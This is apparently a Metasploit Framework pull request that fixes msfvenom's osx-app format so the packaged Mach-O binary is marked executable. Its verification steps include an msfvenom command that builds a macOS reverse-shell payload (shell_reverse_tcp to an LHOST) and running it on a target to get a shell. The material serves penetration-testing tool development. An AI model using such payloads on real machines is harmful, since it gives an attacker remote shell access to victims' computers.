### PR TITLE
Fix #7703, mark osx-app macho as executable

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -887,9 +887,10 @@ require 'msf/core/exe/segment_appender'
     zip = Rex::Zip::Archive.new
     zip.add_file("#{app_name}/", '')
     zip.add_file("#{app_name}/Contents/", '')
-    zip.add_file("#{app_name}/Contents/MacOS/", '')
     zip.add_file("#{app_name}/Contents/Resources/", '')
-    zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe)
+    zip.add_file("#{app_name}/Contents/MacOS/", '')
+    # Add the macho and mark it as executable
+    zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe).last.attrs = 0x10
     zip.add_file("#{app_name}/Contents/Info.plist", info_plist)
     zip.add_file("#{app_name}/Contents/PkgInfo", 'APPLaplt')
     zip.pack


### PR DESCRIPTION
Complete credit to @thecarterb for this finding!
I've copy and pasted the description from #8395 

1. The outputted file from msfvenom (`osx-app`) is a ___zip___ file, not an app file (which I personally think should be mentioned after generation)
2. The app wouldn't run unless the binary in `Contents/MacOS` was chmod'd (`777` maybe `755`) 

## Verification

- [ ] Start a handler (payload: `osx/x64/shell_reverse_tcp`)
- [ ] Do `msfvenom -p osx/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f osx-app -o out`
- [ ] Unzip out
- [ ] Run the unzipped app on the target machine
- [ ] **Verify** that you get a shell
- [ ] **Verify** that it works with all osx payloads

## Old problems

- Command to generate app

![](http://i.imgur.com/4iHgBMF.png)

- Old generated app 

![](http://i.imgur.com/JcyVeqc.png)

- Error from running app (El Capitan 10.11.6)

![](http://i.imgur.com/0Tlqdwr.png)